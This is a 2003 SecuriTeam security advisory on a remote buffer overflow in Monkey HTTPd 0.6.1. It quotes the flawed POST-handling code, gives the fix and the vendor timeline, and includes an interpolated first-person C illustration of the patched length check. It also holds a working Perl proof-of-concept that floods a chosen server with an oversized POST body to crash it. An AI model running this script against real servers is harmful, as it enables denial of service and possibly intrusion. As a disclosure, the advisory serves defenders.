[UNIX] Monkey HTTP Daemon Remote Buffer Overflow

From: support@securiteam.com
Date: 04/21/03

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 21 Apr 2003 13:43:36 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    In the US?

    Contact Beyond Security at our new California office
    housewarming rates on automated network vulnerability
    scanning. We also welcome ISPs and other resellers!

    Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
    - - - - - - - - -

      Monkey HTTP Daemon Remote Buffer Overflow
    ------------------------------------------------------------------------

    SUMMARY

     <http://monkeyd.sourceforge.net/> Monkey is a "Web server written in C
    that works under Linux. This is an open source project based on the
    HTTP/1.1 protocol. The objective is to develop a fast, efficient, small,
    and easy to configure web server". A buffer overflow vulnerability in the
    product allows remote attackers to cause it to execute arbitrary code.

    DETAILS

    Vulnerable systems:
     * Monkey HTTPd version 0.6.1

    Immune systems:
     * Monkey HTTPd version 0.6.2

    A buffer overflow vulnerability exists in Monkey's handling of forms
    submitted with the POST request method. The unchecked buffer lies in the
    PostMethod() procedure. The buffer allocated on line 3 of PostMethod():

     char buffer[MAX_REQUEST_BODY];

    is of size MAX_REQUEST_BODY, which is defined as follows in monkey.h:

     #define MAX_REQUEST_BODY 10240 /* Maximum request buffer */

    The security check on line 10 of the procedure:

     if(content_length_post<=0){

    is flawed: it rejects only non-positive lengths and never compares the
    length against MAX_REQUEST_BODY, so a body longer than the buffer is
    copied in full by the loop below, overrunning it:

     memset(buffer,'\0',sizeof(buffer));
     for(i=4;i<strlen(post_buffer);i++){
      buffer[i-4]=post_buffer[i]; // Buffer overflow: bounded by the input length, not by sizeof(buffer)
     }

    Analysis:
    Because the buffer that is overrun is a local variable, it resides on the
    stack on all architectures. On systems that store the return address on
    the stack, control of execution flow is therefore possible; in that case
    successful exploitation yields the privileges of the monkey binary. An
    unsuccessful exploit attempt crashes the server, denying service to other
    users.

    Exploit:
    #!/usr/bin/perl
    # monkey-nuke.pl
    # Monkey HTTPd Remote Buffer Overflow
    # Discovery/Exploit by Matthew Murphy
    use strict;
    use warnings;
    use IO::Socket;

    # Read one line from STDIN, strip the newline and surrounding whitespace,
    # and fall back to the default when nothing was entered.
    sub prompt {
        my ($text, $default) = @_;
        print STDOUT $text . " [" . $default . "]: ";
        my $line = <STDIN>;
        $line = "" unless defined $line;
        chomp $line;
        $line =~ s/^\s+|\s+$//g;
        return $line eq "" ? $default : $line;
    }

    my $host   = prompt("What host to connect to", "");
    my $port   = prompt("What port to connect to", "80");
    my $script = prompt("What script to submit to", "cgi-bin/test.pl");
    my $addr   = "$host\:$port";
    # 11000 bytes exceeds MAX_REQUEST_BODY (10240), so the copy loop in
    # PostMethod() writes past the end of the stack buffer.
    my $buffer  = "A" x 11000;
    my $exploit = "POST /$script HTTP/1.0\r\n";
    $exploit .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $exploit .= "Content-Length: 11000\r\n\r\n";
    $exploit .= "$buffer\r\n\r\n";
    my $f = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $addr)
        or die "Could not connect to $addr: $@";
    print $f $exploit;
    sleep 5;
    undef $f;

    Solution:
    In monkey.c, replace the line:

     if(content_length_post<=0){

    With:

     if(content_length_post<=0 || content_length_post >= MAX_REQUEST_BODY){

    Stop the server, re-build your binary, and restart the server.
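    As an added illustration of the flaw described in DETAILS and of the
    check introduced in the Solution section (this is not code from the
    advisory or from Monkey itself), the C program below places the quoted
    check and its 0.6.2 replacement side by side and shows a copy of the POST
    body that is bounded by the destination size rather than by strlen() of
    the input. The 4-byte prefix follows the original loop's starting index
    of 4; the names copy_post_body and try_body are my own, and the
    11000-byte input mirrors the proof of concept above. One caveat the
    quoted code makes visible: the patched check bounds only the declared
    Content-Length, while the loop copies strlen(post_buffer) bytes, so a
    safe copy must also be limited by the size of the destination buffer.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_REQUEST_BODY 10240 /* same limit as monkey.h */
#define POST_PREFIX 4          /* leading bytes the original loop skips (i starts at 4) */

/* The check as the advisory quotes it from PostMethod(): it rejects only
 * non-positive lengths, so an oversized body is accepted.
 * Returns 1 if the request would pass, 0 if it would be rejected. */
int original_check_accepts(long content_length_post)
{
    return !(content_length_post <= 0);
}

/* The check as patched in Monkey 0.6.2 (see the Solution section). */
int patched_check_accepts(long content_length_post)
{
    return !(content_length_post <= 0 || content_length_post >= MAX_REQUEST_BODY);
}

/* Bounded replacement for the copy loop (hypothetical helper). Copies the
 * body that follows the POST_PREFIX bytes into dst and returns the number
 * of bytes copied, or -1 when the request is rejected. The copy is limited
 * by dst_size, not by strlen() of attacker-controlled input, and the actual
 * body must not exceed the declared Content-Length, which the patched
 * length check alone does not guarantee. */
long copy_post_body(const char *post_buffer, long content_length_post,
                    char *dst, size_t dst_size)
{
    size_t in_len, body_len;

    if (!patched_check_accepts(content_length_post) ||
        (size_t)content_length_post >= dst_size)
        return -1;
    in_len = strlen(post_buffer);
    if (in_len < POST_PREFIX)
        return -1;
    body_len = in_len - POST_PREFIX;
    if (body_len > (size_t)content_length_post)
        return -1;
    memset(dst, '\0', dst_size);
    memcpy(dst, post_buffer + POST_PREFIX, body_len);
    return (long)body_len;
}

/* Constructed test input: a post_buffer of POST_PREFIX filler bytes followed
 * by body_len 'A's (the same shape as the advisory's proof of concept), run
 * through copy_post_body with the given declared Content-Length. */
long try_body(size_t body_len, long declared_len)
{
    static char post_buffer[POST_PREFIX + 11000 + 1];
    static char buffer[MAX_REQUEST_BODY]; /* stands in for the stack buffer */

    if (body_len > 11000)
        return -2;
    memset(post_buffer, 'A', POST_PREFIX + body_len);
    post_buffer[POST_PREFIX + body_len] = '\0';
    return copy_post_body(post_buffer, declared_len, buffer, sizeof buffer);
}

int main(void)
{
    printf("original check accepts 11000: %d\n", original_check_accepts(11000));
    printf("patched check accepts 11000:  %d\n", patched_check_accepts(11000));
    printf("copy of 100-byte body:        %ld\n", try_body(100, 100));
    printf("copy of 11000-byte body:      %ld\n", try_body(11000, 11000));
    printf("declared 100, actual 11000:   %ld\n", try_body(11000, 100));
    return 0;
}
```

    Compiled with any C compiler, the program reports that the original check
    accepts a Content-Length of 11000 while the patched one rejects it, and
    that the bounded copy refuses both an oversized body and a body longer
    than its declared length.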

    Vendor response:
    The vendor was contacted on March 15; a fix was made public 9 days later,
    on March 24. The fixed version, Monkey 0.6.2, is available at:
    <http://monkeyd.sourceforge.net/get_monkey.php?ver=4>

    Disclosure timeline:
    March 15, 2003: Initial developer notification
    March 18, 2003: Response from Eduardo Silva (edsiper@yahoo.es) indicates
    that the vulnerability will be fixed by March 24
    March 23, 2003: Final contacts with developer
    March 24, 2003: Monkey HTTPd 0.6.2 released
    April 20, 2003: Public disclosure

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:mattmurphy@kc.rr.com>
    Matthew Murphy.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
